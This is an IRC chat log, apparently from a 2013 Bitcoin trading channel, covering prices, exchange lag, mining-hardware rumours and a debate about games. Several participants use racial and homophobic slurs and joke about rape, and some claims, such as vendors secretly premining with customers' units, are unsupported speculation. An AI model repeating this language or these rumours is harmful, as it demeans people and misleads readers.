Next difficulty estimate | 8931575.85222 based on data since last change | 8537297.41708 based on data for last three days Apr 08 14:19:58 at least 1 or 2 of Avalon/BFL/AM are mining on the side Apr 08 14:20:43 probly all 3 Apr 08 14:20:50 incentive is just too high Apr 08 14:21:12 even one unit is oodles of money Apr 08 14:21:26 you mean AM mining without paying dividends? Apr 08 14:21:29 yes Apr 08 14:21:39 right, would make sense Apr 08 14:21:52 and Avalon not shipping their unit til after they mine with them a few weeks Apr 08 14:22:09 ThickAsThieves there was a dispute a few weeks ago about that Apr 08 14:22:11 and BFL not shipping at all til diff gets high enough for it to tip profit scale Apr 08 14:22:26 people were incensed at my suggestion that users reporting dusted units delivered = premining with them Apr 08 14:22:48 it just makes sense Apr 08 14:23:43 none of the 3 have anyone to answer to, except maybe BFL Apr 08 14:24:00 someone needs to run a spy op on them Apr 08 14:29:34 mircea_popescu you fag hater, hi :) Apr 08 14:29:35 and deposits pls Apr 08 14:29:35 lol my ex-boss insists on shorting bitcoins Apr 08 14:29:35 he was introduced to them just some month ago. but he knows for sure this is a bubble Apr 08 14:29:35 homofag Apr 08 14:29:35 i keep hearing bubble Apr 08 14:29:35 but no pop Apr 08 14:29:37 jurov: you cant short them though Apr 08 14:29:45 jurov: you can only sell the ones you have Apr 08 14:30:07 could buy puts Apr 08 14:30:33 jurov i am sorry we don't process fairy bitcoins today Apr 08 14:30:36 but he wanted somehow to do it without buying them at all Apr 08 14:30:49 tell him, hold fiat, thats how Apr 08 14:30:57 basically what ThickAsThieves said Apr 08 14:30:57 ThickAsThieves: lol Apr 08 14:31:07 but i'd really love to screw him Apr 08 14:31:07 wait until the bubble pops and then buy in Apr 08 14:31:14 jurov: no, I think hes right Apr 08 14:31:16 this is a bubble Apr 08 14:31:27 jurov: support him. get him worked up about it. tell him "go for it! yeeeeah" Apr 08 14:31:43 bring him a pitch fork Apr 08 14:31:56 the bobble needs to pop before we can build a new stable floor Apr 08 14:31:58 but he asked how. or is there a fool who wants to lend him btc? Apr 08 14:32:01 [HAVELOCK] [HIM] 5 @ 1.93 = 9.65 BTC [+] Apr 08 14:32:08 but no pop << that's because it's not a cherry. Apr 08 14:32:18 jurov so let him buy puts/sell calls. Apr 08 14:32:20 it will end with him and bernanke eating a gallon tub of icecream watching cnbc together to cover their tears Apr 08 14:32:25 jurov: well, he could take a bet up with mp Apr 08 14:32:33 jurov if you are so sure he's cray, sell him puts in fiat Apr 08 14:32:41 yea, i think he'll end up as coinbr customer Apr 08 14:32:42 ThickAsThieves: I wouldnt Apr 08 14:32:45 the guy is jurov's boss Apr 08 14:32:48 http://bitbet.us/bet/330/mtgox-bitcoin-usd-exchange-rate-200-before/ << he can bet NO there. Apr 08 14:32:48 we need a third party Apr 08 14:33:10 he's ex-boss. no power anymore Apr 08 14:33:31 and i think the bubble is industrial strength so far. unpoppable. Apr 08 14:33:47 hehe Apr 08 14:33:48 may just deflate a bit Apr 08 14:33:53 nice mircea Apr 08 14:33:56 miss you btw Apr 08 14:34:00 miss me ?! Apr 08 14:34:06 ;;market --sell 100000 Apr 08 14:34:06 of course Apr 08 14:34:09 A market order to sell 100000 bitcoins right now would net 9540076.0121 USD and would take the last price down to 35.0000 USD, resulting in an average price of 95.4008 USD/BTC. | Data vintage: 58.8457 seconds Apr 08 14:34:20 miss teh lulz Apr 08 14:34:31 i'm practically always here Apr 08 14:34:46 shhh, dont ruin the moment Apr 08 14:34:51 btwm, anyone here won anything from raping that adria chick ? Apr 08 14:35:13 the worst thing about mp (and jurov, ukto, burnside, topace) is that they sleep Apr 08 14:35:15 so lame Apr 08 14:35:17 :) Apr 08 14:35:33 2 hours is all you need Apr 08 14:35:41 well, if you know some azn i can entrust deposits to... Apr 08 14:35:58 and while you sleep you should have someone watching you sleep ready to wake you up for an emergency Apr 08 14:35:58 better wait these few hours. Apr 08 14:36:04 asian? Apr 08 14:36:21 yes, asian. to be available while i sleep Apr 08 14:36:30 which part of asia? Apr 08 14:36:48 he wasnt serious Apr 08 14:36:56 mmk Apr 08 14:36:56 should i troll you "i like thai boys"? Apr 08 14:37:08 yuck Apr 08 14:37:16 why would you do that when there's vaginas? Apr 08 14:37:27 vags smell Apr 08 14:37:32 true Apr 08 14:37:58 here's a simple explanation of the bitcoin/fiat relationship : http://polimedia.us/dtng/c/src/136542105834.jpg Apr 08 14:38:23 ass to mouth kind of relationship? Apr 08 14:38:52 [MPEX] [S.MPOE] 660 @ 0.00065872 = 0.4348 BTC [+] Apr 08 14:38:53 [MPEX] [S.MPOE] 2534 @ 0.00065873 = 1.6692 BTC [+] Apr 08 14:39:11 coinbr deposits credited. Apr 08 14:40:21 more like spanking Apr 08 14:41:49 oh Apr 08 14:42:19 i have a good one mircea id like to do Apr 08 14:43:29 its basicually a bunch of dinosaurs standing around looking at this huge big thing hurdling towards earth that's about to wipe them out, but instead a astroid its a very big bitcoin Apr 08 14:44:49 pathetic Apr 08 14:44:49 BitHub: im gonna steal your idea thanks Apr 08 14:45:02 no worries Apr 08 14:45:54 yea kinda too direct and unedgy for my style. Apr 08 14:46:13 i like getting people to where they start stammering about how i'm a homophobe nigger hatin' rapist or something Apr 08 14:46:38 or a swine flue virus in the shape of bitcoin eating all the bankers/marketdroids Apr 08 14:47:25 really mircea? Apr 08 14:47:56 i like how people completely forget who i am in about 1 year Apr 08 14:48:03 lay low Apr 08 14:48:40 when most of the people are now old and sick and dying and thinking about their life, wont be a trace of me in it Apr 08 14:49:01 O_o Apr 08 14:49:10 http://polimedia.us/dtng/c/src/128215357439.jpg Apr 08 14:49:16 actually someboduy should prolly chop a btc in there. Apr 08 14:49:50 isn't that nike shoes ad? Apr 08 14:50:13 lul wth Apr 08 14:50:27 lol Apr 08 14:50:30 so many things to say about that pic heh Apr 08 14:50:44 like, wanna get a sprinter kid? wear 'em Apr 08 14:50:51 during Apr 08 14:50:58 https://bitcointalk.org/index.php?topic=170305.0 Apr 08 14:51:00 why isn't she wearing timberland boots? Apr 08 14:51:01 for the flulz. Apr 08 14:51:32 ok, i got another. this one is about the power of education by example : http://polimedia.us/dtng/c/src/134618245439.jpg Apr 08 14:52:05 lol Apr 08 14:52:45 shit, that's someones daughter yo Apr 08 14:52:46 the problem with bubble predictors is that even if they are right, the market can remain irrational a lot longer than they can remain solvent Apr 08 14:53:03 mircea that guy looks more cock hungry than her Apr 08 14:54:40 BitHub hence my comment. Apr 08 14:55:30 haha Apr 08 14:55:31 more lulz plz Apr 08 14:56:46 uh oh, fat washed up comedians are pimping bitcoin now Apr 08 14:56:47 http://www.thebitcointrader.com/2013/04/drew-carey-and-roseanne-barr-are.html Apr 08 14:58:03 BitHub here's a funny one with niggers http://polimedia.us/dtng/c/src/136097321137.jpg Apr 08 14:59:24 hah thieves Apr 08 14:59:24 http://www.theverge.com/2013/4/7/4194142/torment-tides-numenera-kickstarter-video-game-record-rpg <- Someone needs to get these game companies kickstarting in btc instead, Bitfunder would be a good fit Apr 08 14:59:24 lol Apr 08 14:59:41 https://bitcointalk.org/index.php?topic=124391.msg1353059#msg1353059 Apr 08 14:59:45 bweahaha Apr 08 14:59:47 god she's too good Apr 08 14:59:52 http://www.paddypower.com/bet/novelty-betting/current-affairs/bitcoin-betting Apr 08 14:59:59 lol Apr 08 15:01:06 ;;ticker Apr 08 15:01:08 BTCUSD ticker | Best bid: 182.90000, Best ask: 183.00000, Bid-ask spread: 0.10000, Last trade: 183.00000, 24 hour volume: 84257.09650220, 24 hour low: 151.44000, 24 hour high: 186.50000, 24 hour vwap: 167.63669 Apr 08 15:01:08 they got pissed cuz they lose too much money betting against bitcoin Apr 08 15:01:15 LULz Apr 08 15:01:17 wtf Apr 08 15:01:19 ;;calc 5,456 * 183 Apr 08 15:01:20 Error: Something in there wasn't a valid number. Apr 08 15:01:24 ;;calc 5456 * 183 Apr 08 15:01:24 998448 Apr 08 15:01:25 hehe its like he doesn't want to be there or something Apr 08 15:01:34 ha! BitBet just about to go into 1mn total bets Apr 08 15:01:58 bitcoin made it on australian news tonight Apr 08 15:01:59 http://youtu.be/mgZhJBKvvTE Apr 08 15:01:59 nice Apr 08 15:02:04 might actually pass sdice this year if evoorhees doesnt get crackalackin Apr 08 15:03:21 i heard asicminer passed sdice Apr 08 15:04:41 !ticker btct asicminer-pt Apr 08 15:04:43 [BTCT:ASICMINER-PT] 1D: 0.751 / 0.7817 / 0.795 (180 shares, 140.7 BTC), 7D: 0.683004 / 0.75853 / 0.795 (1507 shares, 1143.1 BTC), 30D: 0.59998 / 0.77718 / 0.973 (7755 shares, 6027.1 BTC) Apr 08 15:04:47 !ticker m s.dice Apr 08 15:04:48 [MPEX:S.DICE] 1D: 0.0028 / 0.00293838 / 0.00301847 (6753 shares, 19.84 BTC), 7D: 0.00276111 / 0.00318903 / 0.00400173 (534925 shares, 1,705.89 BTC), 30D: 0.00276111 / 0.00364232 / 0.006 (1637072 shares, 5,962.74 BTC) Apr 08 15:04:55 ;;calc .78 * 4 / 10 Apr 08 15:04:55 0.312 Apr 08 15:04:58 just about. Apr 08 15:05:26 !ticker m s.mpoe Apr 08 15:05:28 [MPEX:S.MPOE] 1D: 0.00063322 / 0.0006534 / 0.00066633 (319604 shares, 208.83 BTC), 7D: 0.00059218 / 0.00067536 / 0.00071514 (1795331 shares, 1,212.51 BTC), 30D: 0.00059218 / 0.00068994 / 0.00077505 (9004112 shares, 6,212.38 BTC) Apr 08 15:05:37 in other news, s.dice + asicminer < s.mpoe Apr 08 15:05:40 this is getting scandalous. Apr 08 15:07:08 now that erik is actually moved out of the US, I figure after a few weeks of loose women and mai tais, he'll have some developments for sdice Apr 08 15:07:46 good ! because fiat value is now close to 40M$ Apr 08 15:08:01 ThickAsThieves: that was my same theory Apr 08 15:08:19 ThickAsThieves: which is why i've held and think its a steal at its current price Apr 08 15:08:21 i actually sold some AM to get these cheape sdice Apr 08 15:09:29 yes, go first ! my bad, value S.dice is more than 52M$ Apr 08 15:10:22 we need more buyers in btc nvesting market Apr 08 15:10:57 exchanges do so little outreach Apr 08 15:11:37 ThickAsThieves that's a market opportunity for anyone with some entrepreneurial blood. Apr 08 15:11:42 IPO set the price @3M$, tell me what in 3 month has change the "real" value of S.dcie Apr 08 15:12:12 xrp for sale at https://xrptrader.com Apr 08 15:12:24 spam detected Apr 08 15:12:44 ThickAsThieves: S.DICE is supposed to be a bot no? Apr 08 15:12:49 like the lottery no? Apr 08 15:12:51 error4733 the fact that its space went from nothing to the talk of the town. Apr 08 15:13:03 if i started a bar on manhattan which was just this island spending 3 mn Apr 08 15:13:11 and in 3 months manhattan became today's manhattan Apr 08 15:13:18 would youy think my bar is worth 3mn ? Apr 08 15:13:39 i mean, it's the same bar. not in the same space anymore. Apr 08 15:13:57 its easy to see high value in sdice as a company Apr 08 15:14:09 but its just as easy to see squandered opportunity Apr 08 15:14:24 personally i see a little more squandered oportunity in asicminer, but yeah Apr 08 15:14:58 same could be argued for bitbet Apr 08 15:15:26 mircea_popescu: ASICMINER will be surpassed by another mining company when as you said, "The real people arrive in bitcoin land" Apr 08 15:15:33 the shuttle has not landed yet unfortunately. Apr 08 15:16:00 did gox have lag for like 20 mins? Apr 08 15:16:10 :/ Apr 08 15:16:32 Latest I've heard on Gox queue: Apr 08 15:16:36 My new waiting list position is now 15,280 (when I submitted 10 days ago, queue started at 6000). Apr 08 15:16:39 ChaangNoi http://jezus.si/graf/dashboards/bitcoin/details/lag/ Apr 08 15:16:58 unbalanced_ im not sure how far i'd trust those numbers. Apr 08 15:17:31 especially if they simply arent processing any at all Apr 08 15:17:42 Ah, like BFL order numbers? Apr 08 15:17:56 they could just be slower than usual Apr 08 15:18:15 unbalanced_ perhaps. Apr 08 15:22:18 187 Apr 08 15:22:44 on a mother fucking cop? Apr 08 15:22:52 on a motherfucking coin Apr 08 15:23:02 :) Apr 08 15:23:04 thanks mp Apr 08 15:23:30 15k waiting, nice Apr 08 15:23:31 vags smell << my cock smells too. the odd part is teh girls love the scent. Apr 08 15:23:35 $300 here we come Apr 08 15:24:10 yea they love vanilla Apr 08 15:24:10 morning Apr 08 15:24:13 what did i miss Apr 08 15:24:54 guess what BTC is up Apr 08 15:24:54 kakobrekla inaba came out of closet Apr 08 15:25:05 did he? Apr 08 15:25:43 i sold a bioshock infite / crysis 3 game code to him for 1 btc Apr 08 15:25:47 :) Apr 08 15:26:55 that sounds too manly Apr 08 15:28:04 186$ for the games, lol Apr 08 15:28:32 "Our user count has increased from 7 to 15 and one of our users (a native Japanese speaker) has volunteered to help edit the Japanese dictionary." haha Apr 08 15:29:04 ThickAsThieves, did you pack in a mining trojan? Apr 08 15:29:25 twas merely a game code Apr 08 15:29:27 alas Apr 08 15:29:39 i have 7 more Apr 08 15:29:54 if anyone planned on buying either game Apr 08 15:30:08 tey prolly got trojaned by chinese anyway... that's why they draw so much Apr 08 15:30:31 do we know anyone in BFL's state? Apr 08 15:30:36 we need a covert op Apr 08 15:30:50 cam in the purse kinda thing Apr 08 15:30:54 there are private investigators everywhere Apr 08 15:31:07 im from the town bfl is operating in Apr 08 15:31:21 i suppose they wouldnt need to actually mine AT their office Apr 08 15:33:07 someone that ordered mini rigs should hire a PI Apr 08 15:33:21 188.78 Apr 08 15:33:37 i don't carry a purse.... Apr 08 15:33:44 ThickAsThieves Apr 08 15:33:51 i recieved the strangest phone call tonight Apr 08 15:34:02 it wasnt me Apr 08 15:34:05 about a bfl operating in australia Apr 08 15:34:16 go visit it Apr 08 15:34:29 i'm waiting for pics via sms Apr 08 15:34:50 my friend went out to the middle of nowhere to start this job and ran into a guy that's a "bitcoin miner" Apr 08 15:34:51 [BTCTC] [BTC-BOND] 2 @ 0.01 = 0.02 BTC [+] Apr 08 15:34:55 is the case for the new ones the same as the fpga? Apr 08 15:35:13 i need to get 100% confirmation Apr 08 15:35:18 i've asked my mate to send me pics Apr 08 15:35:31 i cant believe it like how the fuck did this guy get a bfl? Apr 08 15:36:06 2 x 120gh apparently, ordered 2 months ago Apr 08 15:36:35 ;;asks 200 Apr 08 15:36:35 There are currently 10021.06 bitcoins offered at or under 200.0 USD, worth 1951263.57221 USD in total. | Data vintage: 87.7052 seconds Apr 08 15:36:47 2 x 60 i mean Apr 08 15:37:01 189.80 Apr 08 15:37:16 i kinda doubt that Apr 08 15:37:27 ;;asks 99999999 Apr 08 15:37:29 There are currently 37525.179 bitcoins offered at or under 99999999.0 USD, worth 419998515.287 USD in total. | Data vintage: 0.0072 seconds Apr 08 15:37:59 189.8 Apr 08 15:38:03 yeah crazy Apr 08 15:38:05 190 Apr 08 15:38:09 usa is waking up Apr 08 15:38:29 insanity Apr 08 15:38:57 this is madness BIIIITTTCOOOOIN!!!! Apr 08 15:39:12 the price is looking like its correlated to the amount of coins available for sale. Apr 08 15:39:31 value is up 35% from 140, coins available is down 35% Apr 08 15:40:10 ;;bids 0 Apr 08 15:40:10 There are currently 31449915 bitcoins demanded at or over 0.0 USD, worth 11449403.9086 USD in total. | Data vintage: 12.0387 seconds Apr 08 15:40:11 190 USD per BTC O.o Apr 08 15:40:17 [MPEX] [O.USD.C155T] 4 @ 0.24413205 = 0.9765 BTC [+] Apr 08 15:40:35 bids are level Apr 08 15:40:38 i told myself i wouldnt buy any more calls til vwap hits 200 Apr 08 15:42:04 the premium on options are so high I just can't go around to buying some Apr 08 15:42:20 I should have bought calls when price was around 120 tho... Apr 08 15:43:01 $avg Apr 08 15:43:03 ThickAsThieves: 168.22 Apr 08 15:44:06 [MPEX] [O.USD.C200T] 278 @ 0.12503255 = 34.759 BTC [+] Apr 08 15:44:20 ;;ticker Apr 08 15:44:22 BTCUSD ticker | Best bid: 187.99000, Best ask: 190.00000, Bid-ask spread: 2.01000, Last trade: 190.00000, 24 hour volume: 86134.18904333, 24 hour low: 152.25000, 24 hour high: 191.00000, 24 hour vwap: 169.50989 Apr 08 15:44:34 i go to eat and not even 190 yet ? Apr 08 15:44:35 what is this Apr 08 15:44:56 It's slow right? Not raising 10% every 15 minutes Apr 08 15:46:29 outrage. Apr 08 15:46:38 It's doubling every 1-2 weeks... Apr 08 15:46:44 my wife was talking about investing in this new restaurant, they want $3000, 36month, 8%APR Apr 08 15:46:54 I should have bought calls when price was around 120 tho... << but you thought premium too high right ? Apr 08 15:46:57 i said fuck that i can make 8% in a day Apr 08 15:47:15 yeah... then the price kept raising Apr 08 15:47:23 heh. Apr 08 15:47:28 seriously... I lost a ton to shorting Apr 08 15:47:30 Nam, guess what Apr 08 15:47:36 fate of the mpoe bot. everyone thinks premiums are too high, tellingly nobody goes in the midmarket. Apr 08 15:47:36 Back in 20-40 USD/BTC Apr 08 15:47:37 it might continue rising Apr 08 15:47:49 Then I bought calls last month... got the BTC back Apr 08 15:47:51 i'm happy about my 188s now :D Apr 08 15:47:53 fucking gox lag Apr 08 15:47:59 Guess I should have done the same this month Apr 08 15:48:06 ;;;;ticker Apr 08 15:48:07 Error: ";;ticker" is not a valid command. Apr 08 15:48:16 ;;ticker Apr 08 15:48:16 BTCUSD ticker | Best bid: 189.00000, Best ask: 190.00000, Bid-ask spread: 1.00000, Last trade: 190.00000, 24 hour volume: 86134.18904333, 24 hour low: 152.25000, 24 hour high: 191.00000, 24 hour vwap: 169.50989 Apr 08 15:48:28 ;;goxlag Apr 08 15:48:28 MtGox lag is 75.52478 seconds. During this time, light travels 0.151350813502 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). Apr 08 15:48:55 oh Gox, you gox me Apr 08 15:49:06 Someone should kill Gox... Apr 08 15:49:18 we're trying Apr 08 15:49:34 Using gox... I mean, what is more lethal than gox? Apr 08 15:49:52 It's so slow you can die old waiting Apr 08 15:49:56 tigers Apr 08 15:50:18 Make the staff have to make a transaction and wait for it to complete to return to work. Apr 08 15:50:26 Gox will fade out after some time. Apr 08 15:50:27 yeah, so far you can buy at bots market price, it usually works out Apr 08 15:50:37 Namworld: you are buying back bonds? Apr 08 15:50:43 yeah Apr 08 15:50:48 can i be last lol Apr 08 15:51:06 If you want... I'm buying a part of it back. Apr 08 15:51:17 If you don't want to have them bought back, don't offer Apr 08 15:51:23 Join us tonight in a Starcraft 2 Bitcoin prize pool sit and go tournament :) http://www.reddit.com/r/starcraft/comments/1bwu7r/eu_starting_5_hours_from_now_the_gauntlet_come/ Apr 08 15:51:24 yeah, i am waiting Apr 08 15:51:30 twas my favorite bond Apr 08 15:51:42 guess i'll dump into asicminer Apr 08 15:51:55 I'll start with volunteers and if I'm missing some I'll do a forced buyback. Apr 08 15:52:13 actually I don't think I can do a partial forced buyback... anyway Apr 08 15:52:42 make two accounts Apr 08 15:52:53 buy at market Apr 08 15:53:09 DeaDTerra: heh, too bad most people dont own starcraft 2 Apr 08 15:53:32 I do... but I wouldn't play tournaments... Apr 08 15:53:36 no time for games Apr 08 15:53:52 I hardly have time here too Apr 08 15:53:54 Well I think gamers and Bitcoin interest should coincide pretty well :) Apr 08 15:54:08 It's just a sit and go, you jump in and play whenever you want and can leave anytime. Apr 08 15:54:21 I also have a hard time with RTS, but no problem with turn-based Apr 08 15:54:27 If you win your group you are awarded some BTC, if not you can just play again with an ew group Apr 08 15:54:52 I can't keep up with fast multi-tasking Apr 08 15:56:10 DeaDTerra: I think gamers should honestly quit. Apr 08 15:56:17 Believe in Satoshi Apr 08 15:56:23 Do something important with their lives instead of wasting time Apr 08 15:56:44 Become monks in the temple of Satoshi? Apr 08 15:57:17 Games are not a waste of time more than any other leisure activity... It's just entertainment. Apr 08 15:57:19 No, become the body of Satoshi so that he may work through you. Apr 08 15:57:23 ;;200 Apr 08 15:57:23 Error: "200" is not a valid command. Apr 08 15:57:25 ;;goxlag Apr 08 15:57:25 MtGox lag is 0.019954 seconds. During this time, light travels 3.99875925839e-05 AU. You could have sent a bitcoin ... nowhere, really (0 AU). Apr 08 15:57:31 ;;asks 200 Apr 08 15:57:33 There are currently 8269.9158 bitcoins offered at or under 200.0 USD, worth 1620932.97386 USD in total. | Data vintage: 0.0012 seconds Apr 08 15:57:35 Namworld: one does not NEED entertainment Apr 08 15:57:48 ;; asks 199.99 Apr 08 15:57:49 There are currently 6712.3312 bitcoins offered at or under 199.99 USD, worth 1309416.70044 USD in total. | Data vintage: 15.7117 seconds Apr 08 15:57:55 We are only on Earth for a short time, why waste it doing dumb shit? Apr 08 15:58:39 gaming is rather useful Apr 08 15:58:57 flexes problem solving skills, creates a culture demanding achievments Apr 08 15:59:09 not all games are equal Apr 08 15:59:13 if translated back (those skills) in a minor way to the real world this has some social impact Apr 08 15:59:16 so do productive tasks Apr 08 15:59:23 gesell: starcraft 2 is not one of those games. Apr 08 15:59:39 after a while, games are just timesucks Apr 08 16:00:02 the world is a thousand times better than people spend their time in WoW or SC2. every person playing games is one less watching tv. Games are not the most productive but at least they are paticipatory Apr 08 16:00:10 s/than/with Apr 08 16:00:29 better than tv, yes. that is not saying much. Apr 08 16:00:36 gesell: they are not productive at all Apr 08 16:00:36 says a lot actually Apr 08 16:00:46 Games are a prison. Apr 08 16:00:50 So is TV, so are movies, Apr 08 16:00:59 bitcoin is a prison Apr 08 16:01:04 entertainment is a prison Apr 08 16:01:11 the type of entertainment is different Apr 08 16:01:16 Gaming is a hobby, it's a entertainment but can also be a way to improve multitasking, micro management and coordination. Apr 08 16:01:21 tv is makes you dumb and full of shit. games are interactively brain sucks.. :) Apr 08 16:01:28 Did you know more "food" is grown in Farmville than in real life? Apr 08 16:01:30 It's only a prison if you let it catch you Apr 08 16:01:32 tv isnt ALL bad Apr 08 16:01:33 Diablo-D3 ahaha good one. Apr 08 16:01:33 geez Apr 08 16:01:35 sorta like this room, only i learn stuff here. Apr 08 16:01:37 Diablo-D3: lol Apr 08 16:01:39 I think TV helps me understand other people a lot Apr 08 16:02:01 DeaDTerra: humans suck at multitasking Apr 08 16:02:07 no it doesn't Apr 08 16:02:07 it should just not be performed at all Apr 08 16:02:18 just focus on the task at hand until its done Apr 08 16:02:28 tv helps you understand bullshit drama. Apr 08 16:02:38 its not real... Apr 08 16:02:43 http://polimedia.us/dtng/c/src/13654259702.png here's a fresh one. Apr 08 16:02:54 makes you crazy and bel;ieve crazy things Apr 08 16:03:43 meanwhile in gaza strip : Police in Hamas-ruled Gaza have started grabbing young men with long or gel-styled spiky hair off the streets, bundling them into jeeps, mocking them and shaving their heads. Apr 08 16:03:53 it can be argued there is no such thing as multitasking Apr 08 16:04:05 i can tiotally see why the libertards are supporting palestine against israel. Apr 08 16:04:09 youre mostly just ignoring a lot of things at once Apr 08 16:04:20 mircea_popescu: supporting either is against Satoshi, really. Apr 08 16:04:26 http://www.ted.com/talks/jane_mcgonigal_gaming_can_make_a_better_world.html Apr 08 16:04:39 Diablo-D3 myeah. Apr 08 16:05:09 gesell: Ive already seen it, I dont subscribe to that belief Apr 08 16:05:25 its just a bizarre subset of "practice makes perfect" Apr 08 16:06:34 I don't know why more people don't free themselves from their prisons. Apr 08 16:07:02 why would they? Apr 08 16:07:09 Let Satoshi work through you, the Savior, Lord, and King of Humanity. Apr 08 16:08:03 Diablo-D3: time for #bitcoin-church Apr 08 16:08:35 http://kopimism.me/ Apr 08 16:08:58 who's punkman anyway ? Apr 08 16:09:26 Diablo-D3: so i agree with you then. i just would say that yes changing the addiction to gaming would be an improvment but the addiction to gaming is already an improvement from prior forms of entertainment Apr 08 16:09:47 [MPEX] [S.DICE] 600 @ 0.00276111 = 1.6567 BTC [-] Apr 08 16:09:56 gesell: yes, but we'd be better off to just ending all addicitons Apr 08 16:10:02 [MPEX] [S.DICE] 125 @ 0.00276101 = 0.3451 BTC [-] Apr 08 16:10:04 I dont know where you live but I'd be happier to see people spend less time addicted to entertainment sports on TV than gaming Apr 08 16:10:17 nah, addictions will always exist Apr 08 16:10:36 addiction fundamentally works on the pathways that allow you to fall in love. Apr 08 16:10:40 gesell, yes, you're right they always exist Apr 08 16:11:00 mircea_popescu: yes, but if you love Satoshi, then that is all the pathway massaging you need. Apr 08 16:11:06 right now it's btc information. but i learn here. Apr 08 16:11:12 who are you to say what massaging i need ? Apr 08 16:11:23 "most of the really pleasant things in life are worth endlessly repeating." Apr 08 16:11:38 mircea_popescu: then you are not a follower of Satoshi Apr 08 16:11:43 punkman srsly, do we know you under a previous incarnation ? Apr 08 16:11:54 mircea_popescu: doubtful Apr 08 16:12:03 a ok. do you run any service or anything ? Apr 08 16:12:31 various things in the works, not yet Apr 08 16:12:37 aite. Apr 08 16:12:39 I'm here to learn Apr 08 16:13:49 [MPEX] [S.MPOE] 3000 @ 0.00065873 = 1.9762 BTC [+] Apr 08 16:25:34 [BTCTC] [BTC-BOND] 120 @ 0.009933 = 1.192 BTC [-] Apr 08 16:29:00 [MPEX] [S.MPOE] 3000 @ 0.00065356 = 1.9607 BTC [-] Apr 08 16:29:27 good to hear punkman Apr 08 16:30:01 ;;asks 99999999 Apr 08 16:30:03 There are currently 38628.507 bitcoins offered at or under 99999999.0 USD, worth 420248240.474 USD in total. | Data vintage: 0.0020 seconds Apr 08 16:30:16 ;;bids 0 Apr 08 16:30:16 There are currently 31440065 bitcoins demanded at or over 0.0 USD, worth 11260061.3773 USD in total. | Data vintage: 12.8361 seconds Apr 08 16:31:04 so if coins avail affects price, along with bid dollar total, we should see a little plateau or dip right now Apr 08 16:32:43 am I seeing that correctly? Apr 08 16:32:48 34 million? Apr 08 16:32:58 ? Apr 08 16:33:21 31 million* Apr 08 16:33:37 31 million coins are demanded Apr 08 16:33:38 meaningless number imo Apr 08 16:33:43 yeah. Apr 08 16:33:50 yeah but 21 million of them are my asks at .00001 Apr 08 16:33:56 ^ Apr 08 16:34:22 ;;bids 1 Apr 08 16:34:23 There are currently 317488.65 bitcoins demanded at or over 1.0 USD, worth 11240718.5782 USD in total. | Data vintage: 113.9340 seconds Apr 08 16:34:34 there we gp Apr 08 16:34:40 there we go lol Apr 08 16:34:45 [BTCTC] [LTC-MINING] 1 @ 0.35 BTC [-] Apr 08 16:34:56 still meaningless Apr 08 16:35:04 dollars matters more Apr 08 16:35:06 a bit less meaningless Apr 08 16:35:10 ;;bids 5 Apr 08 16:35:11 There are currently 201529.11 bitcoins demanded at or over 5.0 USD, worth 11005649.7257 USD in total. | Data vintage: 0.0124 seconds Apr 08 16:35:16 ;;vol Apr 08 16:35:17 Error: "vol" is not a valid command. Apr 08 16:35:18 Guest31437 are you the forum wealth advisor guy ? Apr 08 16:35:20 ;;volume Apr 08 16:35:21 Error: "volume" is not a valid command. Apr 08 16:35:26 it there a way to see volume? Apr 08 16:35:32 ;;depth Apr 08 16:35:33 Error: "depth" is not a valid command. Apr 08 16:35:37 dunno Apr 08 16:35:38 ;;ticker Apr 08 16:35:39 BTCUSD ticker | Best bid: 188.50004, Best ask: 188.90000, Bid-ask spread: 0.39996, Last trade: 188.50004, 24 hour volume: 88117.25656920, 24 hour low: 152.25000, 24 hour high: 191.00000, 24 hour vwap: 170.38540 Apr 08 16:35:48 [MPEX] [O.USD.C200T] 39 @ 0.12811778 = 4.9966 BTC [+] Apr 08 16:36:06 ;;asks 9999999 Apr 08 16:36:07 There are currently 38550.022 bitcoins offered at or under 9999999.0 USD, worth 196430772.993 USD in total. | Data vintage: 56.0385 seconds Apr 08 16:36:08 mircea - yes. MPOE let me know about this resource, figured I'd check it out. Apr 08 16:36:12 mpoe users are being very cautious... Apr 08 16:36:28 perhaps the BCB has lost control of the price Apr 08 16:36:47 Guest31437 hehe okay. Apr 08 16:37:14 thestringpuller jus' fer you, fresh from the user contributed pits : http://polimedia.us/dtng/c/src/13654259702.png Apr 08 16:42:33 [MPEX] [O.USD.C155T] 10 @ 0.24917244 = 2.4917 BTC [+] Apr 08 16:43:38 lol Apr 08 16:43:48 say something bad about devs so we get more cheap coins , quikcly Apr 08 16:44:05 devz sux Apr 08 16:44:20 these beans are shit. Apr 08 16:44:24 i mean, these devs are shit. Apr 08 16:44:49 unless they're magic devs, in which case you can use them to make a devstalk Apr 08 16:45:26 ;;asks 99999999 Apr 08 16:45:29 There are currently 38837.418 bitcoins offered at or under 99999999.0 USD, worth 420348159.519 USD in total. | Data vintage: 0.0020 seconds Apr 08 16:45:34 ;;bids 0 Apr 08 16:45:35 There are currently 31438380 bitcoins demanded at or over 0.0 USD, worth 11294377.3662 USD in total. | Data vintage: 5.7703 seconds Apr 08 16:45:43 kakobrekla aww why haet. Apr 08 16:45:47 if you're lucky, this devstalk will lead to untold riches; but there's a good chance there's also an angry giant up there waiting to crush you Apr 08 16:45:55 sounds basically like bitcoin, right? =P Apr 08 16:46:05 cause devs suck at life i herd Apr 08 16:46:08 hehe Apr 08 16:46:12 hehehe Apr 08 16:46:31 actually, i think you'll like the bitcoin/fiat relationship one Apr 08 16:46:33 where was it Apr 08 16:46:39 http://polimedia.us/dtng/c/src/136542105834.jpg Apr 08 16:46:48 :D Apr 08 16:50:06 what is that supposed to mean popescu "A ponzi could not have survived april 3 through 7th" Apr 08 16:50:54 well... trend trading tends to go bust when the trend leaves. Apr 08 16:51:51 my prediction of a plateau is holding true so far Apr 08 16:52:04 plateau hasn't arrived yet Apr 08 16:52:07 maybe 200 a coin? Apr 08 16:52:13 i mean short term Apr 08 16:52:33 i'm looking at correlation of bitcoins available to bitcoin value Apr 08 16:52:42 along with bids dollars up Apr 08 16:52:54 ;;bids 0 Apr 08 16:52:55 There are currently 31438713 bitcoins demanded at or over 0.0 USD, worth 11320552.5806 USD in total. | Data vintage: 106.2635 seconds Apr 08 16:53:03 ;;asks 99999999 Apr 08 16:53:03 There are currently 39373.803 bitcoins offered at or under 99999999.0 USD, worth 420456772.352 USD in total. | Data vintage: 114.6406 seconds Apr 08 16:53:15 I know plenty of people (including myself) are just holding to BTC, which reduce available BTC Apr 08 16:53:25 actually not true... I've been selling a bit Apr 08 16:53:28 14,000 in 